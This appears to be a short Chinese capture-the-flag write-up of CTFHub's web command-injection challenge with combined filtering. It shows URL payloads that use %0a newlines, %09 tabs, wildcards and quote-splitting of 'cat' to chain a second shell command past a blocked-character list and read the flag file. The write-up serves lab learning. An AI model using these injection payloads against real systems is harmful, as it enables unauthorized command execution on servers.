CTFHUB-web-RCE-综合过滤练习

开启题目

查看网页源代码发现这次网页对 | 、 && 、 || 、 \ 、 / 、; ,都进行了过滤处理

发现换行符 %0a 和回车符 %0d 可以进行测试,在 URL 后面拼接访问

复制代码
127.0.0.1%0als

用 ls flag_is_here 查看 flag 文件中的内容,发现回显为空,发现网页源代码中还过滤了几个字符,分别是 cat 、 flag 、 ctfhub ,这里尝试使用 %09 ( URL 编码中 表示 Tab 制表符)加上通配符进行绕过

复制代码
127.0.0.1%0als%09*here
复制代码
127.0.0.1%0acd%09*here%0ac%27a%27t%09*_31687958414358.php
相关推荐
数据知道15 分钟前
SQL 注入从入门到精通:手工注入 + sqlmap 自动化
网络·数据库·sql·网络安全·自动化
雾屿_Mistisle1 小时前
文件上传漏洞
web安全
数据知道2 小时前
OWASP Top 10 实战通关指南:总览篇
网络·安全·网络安全
雨辰AI2 小时前
K8s 国产数据库慢 SQL 自动监控|Prometheus+Grafana 可视化全落地
数据库·sql·安全·容器·kubernetes·grafana·prometheus
Lust Dusk4 小时前
记一次web渗透做题思路解析
网络·安全·web安全·网络安全
Thom5804 小时前
【聚宽 JoinQuant】聚宽如何获取持仓和订单?get_orders()与get_open_orders()教程
人工智能·经验分享·量化交易·聚宽·量化编程
山东科恩光电5 小时前
如何通过科学安装安全地毯提升工作场所的防护效果?
安全
飞跨浏览器5 小时前
跨境电商浏览器是什么?多店铺安全环境怎么搭建
安全
三流架构师6 小时前
产品经理资料合集
经验分享
Sagittarius_A*6 小时前
Burst Lab|PHP 审计 10:PHP 网络请求与 SSRF 漏洞审计思路
网络·安全·web安全·php·代码审计